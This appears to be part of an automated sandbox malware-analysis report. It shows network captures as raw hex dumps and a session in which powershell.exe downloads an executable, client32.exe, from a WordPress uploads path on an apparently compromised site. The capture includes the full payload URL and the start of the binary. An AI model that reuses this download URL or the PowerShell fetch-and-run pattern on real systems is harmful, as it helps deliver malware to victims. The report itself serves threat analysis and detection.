                                                                                                                      2023-09-07 16:19:24 UTC2648INData Raw: 3f 01 f6 c8 2f 36 aa ea 8f ce 1e b9 fa 48 ca c1 65 83 61 28 d8 8c 3c b4 11 1e 97 b5 ac 32 6b 20 30 ed eb 28 d3 96 7d 48 4c 0b b7 5e 37 b7 fc b4 09 77 d3 f5 9a df d3 bd 0e ee 23 45 13 b5 ca 8a df c7 dd b3 be f1 7a 95 a3 bf ab ca 8c 9d da c6 db 85 58 a1 b0 02 2a 2c 56 9c 54 99 53 f9 bb 2e 78 05 91 75 b4 19 c6 dd d0 39 e8 12 fa 3e c0 7e 03 e0 4d 1f 10 e0 96 c1 b8 94 5d d8 a1 1c 6b b9 a0 82 49 c6 0a 4e 08 fd a8 20 60 a8 a0 48 ab e0 4d 7e 2b 17 39 d4 3a 82 8d 20 ad ea d2 04 56 f9 36 da d4 11 37 44 b8 f5 2a 56 8f 7e 87 a7 58 65 85 5d ff 02 33 94 d6 e3 ee 10 cc 5b 3c dd 63 fd 8e c5 d9 6c b6 fd 1d b4 3b 02 b5 56 d6 c1 e2 32 76 2c 89 95 ad b7 67 d4 2c 8e 61 3b d2 76 4b 71 f9 ea a2 6e d9 7a a7 57 f9 57 99 49 b0 e0 cd 84 81 5a ad c4 c3 0e 93 ff 9f 80 81 fb c8 c4 22
                                                                                                                      Data Ascii: ?/6Hea(<2k 0(}HL^7w#EzX*,VTS.xu9>~M]kIN `HM~+9: V67D*V~Xe]3[<cl;V2v,g,a;vKqnzWWIZ"
                                                                                                                      2023-09-07 16:19:24 UTC2656INData Raw: 4f d0 fd a2 72 cb 32 63 ba b8 71 10 b7 97 6c d5 34 aa 37 94 bc 52 cd df 7f c5 df e7 94 bc 82 4f 11 9f 82 66 a8 b8 f7 69 59 b2 02 0f 76 0b fb 3f 0d 36 e1 da 23 19 2c fe dc 35 ef a1 ca 1e d4 00 7f 41 77 a6 ca 85 dd 69 e1 e9 6c e8 7a 02 1c f2 ca 89 03 95 18 22 8a ef 1a 71 13 2e 67 63 ce c6 5a ad f7 35 82 fa e4 95 46 ea c4 3a 02 e3 51 ec 2d fe c2 ea 41 d8 55 94 3f 2e 25 08 d9 6c d0 2e 92 86 ee 35 21 f8 85 6a de 42 a7 75 58 ab e8 0d b3 f2 3b ba e3 df e7 e0 55 61 e6 d6 58 ad 43 97 04 6e c4 d6 9a 1a 6b 39 d1 a0 55 1b 6d 08 3d 6b ff a7 e2 df 6a 4a ae 1f 5a 4d 68 70 2c 34 d1 2f b6 25 45 e5 91 0d c2 44 30 b6 02 e1 d1 61 c5 99 0f 23 b2 f1 03 6b 2b 82 0f da c2 36 fb 38 dc 1a 13 f8 cc 74 b6 0e 7b 02 f4 b2 9d e6 8b c9 b7 25 b0 c7 54 32 60 3c 12 c0 7e 4d 15 1f fc 4a 06
                                                                                                                      Data Ascii: Or2cql47ROfiYv?6#,5Awilz"q.gcZ5F:Q-AU?.%l.5!jBuX;UaXCnk9Um=kjJZMhp,4/%ED0a#k+68t{%T2`<~MJ
                                                                                                                      2023-09-07 16:19:24 UTC2664INData Raw: 92 c8 86 80 b9 b3 14 3c 41 99 53 f9 76 3b 36 61 84 14 7c 80 1e 46 4a c1 19 d8 5d 69 c1 6a c2 68 29 38 85 92 d3 59 be 8b 3d 96 2c 05 67 d2 eb 38 96 67 97 b6 78 71 27 de ca f9 b4 6b 2f 15 fe 66 ec 14 97 fb 7e 84 57 71 38 c3 2d b1 52 f0 38 ba c0 e4 67 b1 a6 dc 36 3c 4b d1 ce 3e 01 3a 07 69 85 b3 5e 5c d7 34 58 5c b7 7f 88 14 fc 80 e6 3c e2 ba 0e 78 ef 1a 20 05 0f e2 3b ed 1a 74 ef 77 af c4 af 62 a3 b8 ae 67 88 b8 ae 7e 00 23 84 dc 84 ad bb 27 85 e7 e2 69 5b 0e 52 7d eb b0 b4 8c 8d 70 d3 be c1 14 d9 4b cf 98 62 d9 c1 36 10 51 48 1b 26 d4 4b ab 3a 20 b7 45 46 8c 12 82 58 b2 22 7c c3 df 53 0f 0c 7d f1 87 d5 59 96 bd 4c c6 66 25 34 48 94 dd 44 73 23 b6 92 08 7e 58 e2 df 64 24 64 dc 86 a3 54 35 11 55 26 ce 84 a1 79 c3 59 67 ca 49 ad 39 d0 bc 86 e1 e2 ba 03 40 96
                                                                                                                      Data Ascii: <ASv;6a|FJ]ijh)8Y=,g8gxq'k/f~Wq8-R8g6<K>:i^\4X\<x ;twbg~#'i[R}pKb6QH&K: EFX"|S}YLf%4HDs#~Xd$dT5U&yYgI9@
                                                                                                                      2023-09-07 16:19:24 UTC2672INData Raw: 26 2b 40 e6 9b 02 64 be 6c 90 31 2d 51 5a cc 1d db 34 67 dc 70 d4 27 80 cc a7 eb b6 0e 53 84 c9 c0 d9 b7 70 cc 8d 41 a9 f9 55 e0 a0 0b ad 35 10 13 ae 8b 81 35 e0 fa 0b 21 96 e4 09 31 a3 eb 30 45 97 50 c1 89 a0 48 f4 93 04 f5 f8 85 67 76 55 d9 7a cd 62 d2 6b 5a fc 83 a1 d2 e8 23 18 a0 20 6e b5 37 e2 64 cd 8a 4a 0e ab 20 9d 14 c2 4b f6 c2 46 07 e1 4b d8 f6 04 15 c6 27 ad a0 ff 60 b6 d9 dc 44 b5 dc 6a ef b4 da 0b 43 f5 a3 f4 08 ce ce d2 b3 c5 4d a8 89 95 9c 98 fc f4 61 e9 84 55 f8 f6 73 f0 57 73 03 53 af 39 7d 03 36 e5 36 c4 ab a1 3a 33 12 54 59 4d f9 90 4c 3a b1 26 31 8b 07 54 a7 40 f7 a9 bf 64 08 92 5f 61 a5 84 6f 35 83 4b f4 ac 6c 35 89 3c 14 f1 6c c6 d5 1e ce 58 c6 7d db ca 08 fa 1c 3e 28 08 96 13 24 73 54 64 fe 70 22 64 7b 17 66 45 c8 06 32 02 20 11 8c
                                                                                                                      Data Ascii: &+@dl1-QZ4gp'SpAU55!10EPHgvUzbkZ# n7dJ KFK'`DjCMaUsWsS9}66:3TYML:&1T@d_ao5Kl5<lX}>($sTdp"d{fE2
                                                                                                                      2023-09-07 16:19:24 UTC2679INData Raw: 64 3b 49 fe 5d 78 60 60 07 09 90 5e e7 31 53 97 e9 a2 7c 3e 2c 77 85 9d 6f 39 1b e5 7a fe c9 0f 38 83 e1 49 69 c2 64 bc 89 27 f1 66 90 cc 4f fe 01 c7 4b e9 c8 ea 35 ab 9c fe 06 92 de 3f ab 41 bc bf da 2f 7e 31 eb 23 f1 1b d5 e7 c4 4f 02 41 2b 44 dd 04 51 67 21 2a 11 a2 de 56 ff 7e f5 1a 46 73 fa c0 ea 35 78 bb c2 6e fd 78 7b 3e 6d ee 12 ae 41 1f 2f 0d 83 06 43 36 ab 8c 8c 97 74 06 35 65 b0 a5 b5 d7 18 3f 89 f2 1a b5 49 d4 36 08 e0 40 05 33 a8 b0 52 d0 95 ef 31 67 2b db d1 f7 10 ac 18 a5 cd a0 44 18 ba 12 e5 46 23 0c 6d e2 1f 21 43 16 69 0f e6 ea 89 d2 47 50 8a ce b0 2e 47 67 58 97 1d d2 08 a1 ee 36 9c 61 15 e0 9c 47 b3 c7 8c 46 cd 1e bb a8 4f e1 ba 98 3d 96 96 1d 9c 3f 2a 32 fd c2 f9 95 9a 79 cd e9 97 23 3b 28 b0 42 d2 ad 43 a7 5f c9 42 dd 02 9c 7e a1 fb
                                                                                                                      Data Ascii: d;I]x``^1S|>,wo9z8Iid'fOK5?A/~1#OA+DQg!*V~Fs5xnx{>mA/C6t5e?I6@3R1g+DF#m!CiGP.GgX6aGFO=?*2y#;(BC_B~
                                                                                                                      2023-09-07 16:19:24 UTC2687INData Raw: f7 c5 ed f2 c7 fd be d9 4f c9 1d 26 d1 bc 48 cc 5a 24 3a d5 9b 09 ff eb de 8f 4c cd 84 7f 59 3e c1 99 02 f0 a3 f0 2f 93 a3 64 fe af 79 1a 3f ff 65 3e 92 00 61 9a 62 d6 52 cc 31 29 66 9a 62 d1 52 2c 31 29 16 72 54 fe 3d 2f fd 7d 01 09 a0 77 3c 66 8f 36 f3 d5 e7 e5 b3 37 62 49 a6 d5 79 86 9e 9e dc db 61 6a 27 49 08 a2 81 ac 41 f4 4a 92 e9 e4 bf 51 8b 3d 9f 97 4f 72 72 93 79 b1 f4 1f 14 98 25 d6 04 62 b2 8b 0c 6a 72 e3 a6 43 4e ba 15 64 2b f0 81 71 19 6d 69 73 70 3c 5d b0 b2 38 fd 78 c8 98 95 a3 87 30 91 02 33 cb a4 64 da 9c 2d d8 c2 b6 d1 bd 1f 9a dc fd 88 37 b7 5f e1 47 ca 01 3c 45 4f 3a 47 dc fd ec 78 32 2b 77 ed f6 78 21 e7 6b 68 0f c7 d5 da c3 71 d5 f6 70 5c b5 3d 1c d7 6c 0f fa 7e 32 36 46 a6 15 db 23 40 8e 9b 1a 5d 03 55 66 57 9f b0 1b 4f c9 eb 6d a2
                                                                                                                      Data Ascii: O&HZ$:LY>/dy?e>abR1)fbR,1)rT=/}w<f67bIyaj'IAJQ=Orry%bjrCNd+qmisp<]8x03d-7_G<EO:Gx2+wx!khqp\=l~26F#@]UfWOm
                                                                                                                      2023-09-07 16:19:24 UTC2695INData Raw: b0 6c 5d 37 1f c7 8c 64 ed be 81 a7 da bb 2e 72 d7 48 dd a8 e8 c2 dd 4f 7c 71 ab 0f 0f 67 23 95 6d 22 ef 27 95 1e 91 3f 4e 2a 3b 45 7e 8c 54 ee 12 f9 2b 12 7f 85 8c b8 25 7e 0c fe f9 dd f2 ef 40 c0 ca 6c 3c e0 ed 77 be c0 ce 2d 64 1f 7d e7 c7 75 11 e5 55 b6 91 7d f8 f6 8d 58 e9 21 fb 10 08 ef 3f d0 6c 22 56 76 92 7d 3d f4 35 b6 cc 2a b1 72 d7 3b 79 9b 5d 8c 48 b9 df 71 62 97 2a 23 52 7e ef dd 2c eb 6b 5b f1 f0 23 0b a9 3b 4e 5c 7e 1c 71 45 b9 6b e2 2f 57 c7 e9 99 8a 07 02 92 91 c7 28 ea f6 3d 8a d3 01 21 de 43 e3 c0 57 85 31 f3 3e 72 d3 5b 78 5d 11 c0 64 42 b9 07 3f fe 8e 83 fe 7f e5 9d 5c fa ff 59 9c eb c7 4b f8 21 eb be 33 34 d5 04 48 d3 61 51 18 25 c2 21 b1 09 8f 39 6d 1a db 50 23 fa 2c 20 4d 3a 80 13 40 e2 27 dd 35 35 71 61 1a f1 8d 0b a3 71 e1 58 ad
                                                                                                                      Data Ascii: l]7d.rHO|qg#m"'?N*;E~T+%~@l<w-d}uU}X!?l"Vv}=5*r;y]Hqb*#R~,k[#;N\~qEk/W(=!CW1>r[x]dB?\YK!34HaQ%!9mP#, M:@'55qaqX
                                                                                                                      2023-09-07 16:19:24 UTC2703INData Raw: 93 2a 56 62 c7 61 f3 79 2b 37 ba 8a e1 20 62 0a e4 65 cd ba 89 86 c3 30 9c 60 c2 76 bb 99 b9 7b 1b 18 a2 84 7d e9 6e 93 d9 bf ae a8 09 c3 2a 82 24 8c b7 c9 09 18 90 13 33 36 dc bf 51 7f 0b 84 60 c5 41 f4 7c 66 e5 5d 1f f0 2b 30 34 78 51 be 9f 04 7a 1f 73 07 f0 5b d2 b0 8f fa 4a a7 34 31 37 cb 53 cc 8c d6 d3 98 c0 32 5a 98 f4 7b 60 0f aa ae b2 c9 1e 74 8e fc 64 96 74 ba d1 17 14 5d e4 91 c8 0a e3 21 dc 50 eb 61 f8 03 47 17 84 dd 04 96 67 72 60 6a 50 46 59 dc d2 15 30 da e3 a8 e1 f8 23 37 44 c0 45 a1 6b 98 14 2e 97 d3 5e 54 26 ae 42 64 6d 13 e9 b2 b6 d9 e9 67 a1 55 4a 37 83 51 5d e1 1c f7 ed a1 9f 42 e2 f5 d1 a0 8c 1b 5a 44 3a 29 76 d4 07 37 71 2f 8c ce 1f 58 92 25 ec 45 2e 6c 00 34 d0 9c 27 35 e7 49 92 d8 09 38 f7 3e 8c da 58 e7 b9 47 3c 2a e8 3e 1f ad fd
                                                                                                                      Data Ascii: *Vbay+7 be0`v{}n*$36Q`A|f]+04xQzs[J417S2Z{`tdt]!PaGgr`jPFY0#7DEk.^T&BdmgUJ7Q]BZD:)v7q/X%E.l4'5I8>XG<*>
                                                                                                                      2023-09-07 16:19:24 UTC2711INData Raw: 78 d2 9b 4a f2 ab 2a 90 d6 31 3c 34 90 6c 57 07 92 d9 a1 81 34 bf 35 21 81 64 2f c0 80 18 08 03 d8 06 70 0a a0 77 6c 20 d1 67 29 89 0a ee 6b 00 ce 03 dc 05 18 15 17 48 a6 02 18 00 de 05 b8 0c e0 1a 1f 48 c6 00 4c 05 30 00 7c 0a 70 1b 20 38 21 90 cc 05 78 16 a0 21 28 90 a4 05 06 92 e5 00 3b 00 0c c1 81 c4 25 38 90 d6 ff d7 b0 40 5a 2f e7 f0 40 f2 1c c0 9f 00 8f 47 04 12 2d 80 0e 60 15 c0 8f 00 4e 91 81 64 04 40 12 c0 22 80 93 00 37 01 ba 69 02 89 1f 40 09 80 53 54 20 79 06 60 37 c0 05 80 8d aa b6 e5 7e 00 f5 30 23 2e a2 e1 1b c0 51 80 eb 00 43 b5 5c 7b e3 e0 ce 68 b9 7a fd 1c ca d5 6b 64 18 87 af 50 b8 2f 02 58 07 10 c4 04 92 b5 00 d5 00 78 f9 ac 0f 24 f6 cf 42 9b 01 4a 00 82 b6 41 1d e0 9e b7 21 90 ac df c0 c5 f9 f3 dd 40 72 16 60 dc 7b dc fb 33 ef 07 92
                                                                                                                      Data Ascii: xJ*1<4lW45!d/pwl g)kHHL0|p 8!x!(;%8@Z/@G-`Nd@"7i@ST y`7~0#.QC\{hzkdP/Xx$BJA!@r`{3
                                                                                                                      2023-09-07 16:19:24 UTC2719INData Raw: 1d 3e 39 8f b1 54 ba 56 62 9d 5f b6 af a1 b5 34 f2 90 7c 72 49 1e 6f 5d c4 fc 72 69 f8 df e5 d2 51 3e 69 74 0c 73 23 fa 9f e7 a4 7a 20 9f 6c cb 3e 6b 1d c5 7f 0e 6d dd 02 6a 6f cf b5 50 bb b5 de 99 96 7d 7e a9 bc fe d5 71 be 0f eb e5 1c 1e cb 7f d5 df 5c de d6 b8 1d e5 3f db c6 0f 31 ff 3f ae bd 9e e4 74 88 db f6 35 2b 78 a0 6e 02 f7 e5 46 7d c1 df f6 91 90 ae c0 e2 7b 98 43 c7 ce df f5 6f db 1a 0b 73 70 5b 1b f2 c3 da f6 3f 9d af 6d ce 19 ff 65 7f 74 5c 0b 62 b1 13 0b ba 16 67 11 e6 6c 38 c2 4a 94 1a a4 70 24 bf a2 93 f1 0f e9 b9 ed 68 4d a7 7c 4b 6f b3 86 96 6f b1 ae a1 ac 8f a7 3b d5 ac 16 fb 07 ad e2 c2 15 66 d1 9d a2 68 ad c6 5b c6 5e 06 5d b9 e4 62 db fa ac ea da ac 52 5b f9 11 57 53 21 d5 02 0b ef 2d e0 b9 94 8e c7 08 77 25 74 48 b7 c9 20 7b 23 1f
                                                                                                                      Data Ascii: >9TVb_4|rIo]riQ>its#z l>kmjoP}~q\?1?t5+xnF}{Cosp[?met\bgl8Jp$hM|Koo;fh[^]bR[WS!-w%tH {#
                                                                                                                      2023-09-07 16:19:24 UTC2726INData Raw: 4f a0 9e 44 dd 82 1a 1b 35 24 6a 3c d4 e5 a8 2d 50 3f a2 1e 47 ad c8 68 6b d4 57 a8 7d 50 d3 a0 9e 42 bd 8c ba 14 75 23 6a 78 d4 7d a8 c5 d0 0b 40 9d 8e 3a 07 35 37 6a 4a f4 1f 50 a7 a3 96 41 ad 86 1a 1c fd 09 f4 02 50 43 a2 66 46 bf 00 f5 16 fa 08 a8 09 51 07 a3 ee 46 7d 89 3a 1e b5 33 ea 58 d4 6c e8 33 a0 6e 46 8d 84 7a 09 b5 37 ea 5e d4 dc a8 5b d1 c3 40 3d 87 9a 14 75 3b 6a 3f d4 ee a8 cf 51 5f a2 e6 45 3d 8e 1a 1c 7d 02 f4 02 50 5b a1 3e 43 cd 89 9a 0f 75 3e fa 21 e8 27 a0 1f 80 9a 16 f5 33 6a 60 d4 da a8 9f 51 23 a2 b6 c5 f3 1f f5 35 6a 54 d4 92 e8 b9 a0 86 43 4d 88 3e 02 fa 32 a8 67 51 e7 a2 47 81 1e 0d ea 4f f4 44 d0 4f 41 3d 8e 3a 15 7d 0d f4 66 d0 d3 41 6d 8b 3a 19 35 2f fa 3b e8 f5 a0 4f 83 7a 1e fd 04 f4 45 50 bf a3 87 83 3e 08 7a 1a e8 3b a0
                                                                                                                      Data Ascii: OD5$j<-P?GhkW}PBu#jx}@:57jJPAPCfFQF}:3Xl3nFz7^[@=u;j?Q_E=}P[>Cu>!'3j`Q#5jTCM>2gQGODOA=:}fAm:5/;OzEP>z;
                                                                                                                      2023-09-07 16:19:24 UTC2734INData Raw: b0 2b 6f 9e 16 8e 32 99 34 7f 44 cc a6 03 09 03 23 1b 5f 68 e0 76 43 57 61 ea a3 19 fb f7 d8 c6 14 14 c4 59 ce 3e d5 ca 66 8f d6 96 70 cb bd be 0f 35 da ba ce b0 59 61 d5 72 f9 b3 0e c3 3d ef 8e d0 dd 51 90 d8 25 62 75 ee e0 85 fd 6c 33 fc 1f cf de 1c dd ba 20 d8 c4 41 cd dc 68 fe 8a 87 53 9a d5 7d d0 66 56 94 51 bf 70 65 fe fc 06 2d 42 46 7f 28 7a 99 af 78 b0 fe d9 3d 5d 7c 36 8d c9 d9 d3 ea 59 58 7e e0 da 6f 45 03 93 44 81 eb ea 1e 9b a1 6e d5 88 e8 36 b9 5f 7c 8b 1d 9d 0c 54 dd ba fe e8 f9 65 49 8c 86 da b2 33 c3 ba 76 7b b9 b5 75 9f da c3 32 38 57 de ef 5e 9b 33 fd fb fa e3 43 2f 14 19 0b 7b b9 1d d9 f9 4a 6d b1 19 6f 93 ca c8 c3 9b b8 19 86 23 6f 2a 42 94 0b 63 ce 4b 71 68 c6 b3 c6 ae d6 34 34 f3 12 a4 64 09 e3 63 e3 44 5c ab 28 6b ae 43 cb 96 2d b8
                                                                                                                      Data Ascii: +o24D#_hvCWaY>fp5Yar=Q%bul3 AhS}fVQpe-BF(zx=]|6YX~oEDn6_|TeI3v{u28W^3C/{Jmo#o*BcKqh44dcD\(kC-
                                                                                                                      2023-09-07 16:19:25 UTC2742INData Raw: 0f 7f e7 cd 73 27 0a 16 48 b6 ab 56 b1 bd aa d7 a8 9c c9 03 70 39 26 c4 9d 78 ba d8 9d b0 81 b7 59 16 b3 6f 6a a5 7d 8d c5 fb 16 54 da 67 2e de b7 a8 d2 3e 0b f1 3e 9e 31 b3 2f 60 a6 3b d1 11 de 96 f4 be 1f f0 aa 5c 43 e6 38 43 32 4f cd e9 ee c4 83 69 54 bb ea 8b f3 34 24 bb f8 c9 12 c9 3e 13 f1 3e a7 4a fb 1a 88 f7 79 55 da 67 2a de 17 5a 69 5f 43 f1 be e1 95 f6 71 c5 fb f6 55 da d7 e8 27 ed bb 3a d9 9d 30 9e e2 4e 74 87 b7 0d ac c7 c3 bb 68 32 75 2e ca be f1 f5 c8 d6 9b f8 68 ef 4d 78 db c1 db c1 9b 38 e7 e8 4d 5c 83 77 d3 cb 1e 44 f9 47 0f e2 89 91 2f 71 a7 96 2f a1 58 db 97 18 01 ef 56 75 7c 89 5e b5 2a 6f 6b 2b 67 db 82 ba be c4 05 78 1b 1b fb 12 79 f0 7e 04 6f ab fa be 84 2f bc e3 e0 bd 1a de 6a 26 be c4 04 68 d3 58 78 8f 83 f7 78 78 4f 84 f7 24 64
                                                                                                                      Data Ascii: s'HVp9&xYoj}Tg.>>1/`;\C8C2OiT4$>>JyUg*Zi_CqU':0Nth2u.hMx8M\wDG/q/XVu|^*ok+gxy~o/j&hXxxxO$d
                                                                                                                      2023-09-07 16:19:25 UTC2750INData Raw: 7f f1 3b f3 6d 08 ae d4 67 5b 98 4f 76 b2 7b 9a e9 5d c9 27 b1 a8 be 93 6d d9 5f ed 41 d7 2a 7a d0 a7 9a ef d3 fa 79 0f 56 df ff 92 5e fc 95 ef df 97 ed 67 fc ee 74 aa e7 d8 33 90 d9 22 fd f9 26 e9 1e 77 86 bf d5 65 3e 5f 64 43 b6 b9 e6 63 2a bf 7e cc a8 b1 7f 6f 80 1a 37 d9 fe ac 7e dc fe 2e c7 37 55 66 5c cc 7e 79 be fc 5f e1 c8 af d1 f3 7f 9c f9 1f 67 fe c7 99 9a 73 86 2f 53 8b ff 7f 39 f3 3f 8e 48 b7 ec ef 26 f5 ff 38 f3 df cb 19 4c c5 1e ed df 53 93 3f d3 b5 dc 2a 3e d3 d9 ea 2f de 5f fb d9 9d f2 aa f5 a8 ec 3d 72 27 da 63 90 be 03 56 dd b3 e6 92 ef 8a fd 77 a8 74 c9 cc aa 4e a1 4b 52 fd e7 d4 39 d6 fc 77 ef cd b3 5b f5 a7 b9 c5 93 e1 d6 ef ff aa 0c f3 f4 b9 a4 3d cc cc a3 ce 5c e9 4f 36 fe d5 2b 9a 43 25 de 32 df 63 26 b9 4b 27 a9 29 95 03 73 ff 58
                                                                                                                      Data Ascii: ;mg[Ov{]'m_A*zyV^gt3"&we>_dCc*~o7~.7Uf\~y_gs/S9?H&8LS?*>/_=r'cVwtNKR9w[=\O6+C%2c&K')sX
                                                                                                                      2023-09-07 16:19:25 UTC2758INData Raw: 23 38 d3 48 b2 86 3c 80 a4 e4 2e 30 42 b6 b0 11 58 a8 9f 3c 59 5e 2b e7 81 af b8 29 02 54 7a 38 d0 c5 6b f5 b7 6a a7 15 03 f3 98 eb 19 f8 13 ae 4e dd a7 7f d3 5d 38 37 d2 04 46 26 0e 08 eb 96 f8 52 fc 29 0e 86 b1 69 27 1b f2 cb b5 b8 2e a8 d5 30 3c 16 9c db 94 72 a6 9b d1 49 f4 1a 3a 9f be 47 fb 32 0f 99 12 e6 0b 99 29 6c 10 ae 08 4f 84 c7 d2 07 89 95 47 40 bd da 2b 08 fa 2b 40 89 54 16 2a 1b 94 83 ca 45 e5 a1 f2 5d a9 aa 7a a8 6d d5 40 48 9c c9 ea 4e c8 4b 8f d4 1f 6a 75 0d 69 1d b4 60 e0 87 25 da 2e ed ac 56 a4 7d 01 86 30 37 8c 80 f7 ad 8c 1a 22 19 c5 82 a6 3e 40 af 91 1b 9e 84 9f e3 6b 54 19 95 03 ef 5e 4c 6f 02 05 7c cf 54 d7 f7 af b4 07 62 9e cd ae 66 ab 72 75 39 86 1b cf ad e4 3e 01 ed d4 e1 9b f3 43 21 3b 0d 24 c7 20 4b ae 17 c6 03 4b da 49 9c 34
                                                                                                                      Data Ascii: #8H<.0BX<Y^+)Tz8kjN]87F&R)i'.0<rI:G2)lOG@++@T*E]zm@HNKjui`%.V}07">@kT^Lo|Tbfru9>C!;$ KKI4
                                                                                                                      2023-09-07 16:19:25 UTC2765INData Raw: c5 00 26 84 89 86 8c 3e 9b 59 cc a4 32 7b f5 7b 1f ae eb 4f 64 f8 08 f5 e4 c2 32 90 5a bb 40 45 05 b3 c3 d8 c9 a0 5c 0b d9 15 ec 7a 76 17 68 57 1e d4 d4 33 d6 00 be 59 8b 63 c1 33 17 41 7a df ce 65 71 47 b9 02 70 c9 52 ee 27 e4 56 3b be 11 ef c1 8b 7c bb 3f b9 75 26 54 d1 5a 7e 2b bf 97 3f 07 b9 f5 2e 5f cc bf 81 e4 fa 9b af 4e 9c a1 92 54 f0 ca 5e e0 95 11 24 86 18 f7 39 ae d6 d7 a6 8e 90 f3 a4 80 3c 21 ef c9 17 62 2f d4 d1 77 79 13 f0 cb ae c2 40 a8 a5 09 c2 74 61 8e 90 2e ec 86 14 7b 4e c8 87 fc f1 55 b0 12 9d 21 7d 60 51 d4 9f 5e 14 28 8e 14 27 41 86 4d 16 57 88 3b f5 5d b8 c6 27 18 3d 06 ed fa 29 56 96 6a 48 0d 74 62 ed 28 05 e9 4f 96 98 05 e4 ba 1c fc 32 4b 3a 2d 5d 96 0a 40 bb 5e 42 0e b1 93 5d f4 1c 6b dc 33 10 00 7e 39 0e 12 49 92 bc 54 ce d2 89
                                                                                                                      Data Ascii: &>Y2{{Od2Z@E\zvhW3Yc3AzeqGpR'V;|?u&TZ~+?._NT^$9<!b/wy@ta.{NU!}`Q^('AMW;]'=)VjHtb(O2K:-]@^B]k3~9IT
                                                                                                                      2023-09-07 16:19:25 UTC2773INData Raw: aa d7 39 cf be d2 d3 c9 23 4b 5d 6d 5e 77 72 59 da fe cb a8 dd 1b 1e 2d b4 fe 79 6b db fc 97 63 9c d3 93 36 34 0e f6 5c 55 b7 6a c9 81 5e 0f 4f ba ef f9 71 e0 5e 0f bb c8 a9 bd 7b 0f 2d 0d eb d4 62 ef d5 9a 77 d2 76 2d f8 11 9b 93 d8 7a c8 83 a0 5e 9e f6 c7 0f b7 2e 6b 7f ec ad f5 00 57 f1 b1 7f e4 e0 41 1b 93 fc e2 2c 06 d5 a8 f7 f5 f5 52 b7 eb 19 ab e6 ce 5c fd fb fd b6 d1 9f 8b 5b 15 a4 ac 3d d6 79 f8 bd 93 1d b8 d7 76 bd 5f 0e 6b 6c be ba 5d 43 bf 07 4f ab 8e ea b3 27 62 93 d9 c0 63 82 e1 c5 ef 5c 12 f1 e5 cc 97 f8 0b 45 ab 97 e5 df ed 64 f1 24 f2 c4 a7 99 d7 2a ce 0d 7d 14 55 d7 70 de fa 91 7f 52 57 c5 b9 8b 87 39 3b 60 6c e8 b7 0b 1f bc 5c df 3e bf 90 55 b0 ad f2 a3 87 55 fa 25 36 1b d8 27 79 c6 82 8a 53 92 f7 f8 85 54 4b b6 ce fd 12 3a b6 45 e7 79
                                                                                                                      Data Ascii: 9#K]m^wrY-ykc64\Uj^Oq^{-bwv-z^.kWA,R\[=yv_kl]CO'bc\Ed$*}UpRW9;`l\>UU%6'ySTK:Ey


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      1192.168.2.649729162.215.249.83443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      2023-09-07 16:19:31 UTC2777OUTGET /wp-content/uploads/2018/01/client32.exe HTTP/1.1
                                                                                                                      Host: www.advisingdealers.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2023-09-07 16:19:31 UTC2777INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 07 Sep 2023 16:19:31 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Thu, 07 Sep 2023 10:30:31 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 105848
                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                      2023-09-07 16:19:31 UTC2778INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fb ca 07 c0 bf ab 69 93 bf ab 69 93 bf ab 69 93 b6 d3 fa 93 bd ab 69 93 a4 36 f5 93 bc ab 69 93 bf ab 68 93 ba ab 69 93 a4 36 c2 93 be ab 69 93 a4 36 f3 93 be ab 69 93 a4 36 f4 93 be ab 69 93 52 69 63 68 bf ab 69 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 54 89 bb 55 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 02 00
                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$iiii6ihi6i6i6iRichiPELTU
                                                                                                                      2023-09-07 16:19:31 UTC2785INData Raw: ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 50 50 51 ff 77 77 78 ff 86 8a 90 ff 93 6e 45 ff c9 82 33 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80
                                                                                                                      Data Ascii: UUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVPPQwwxnE36666666666666666
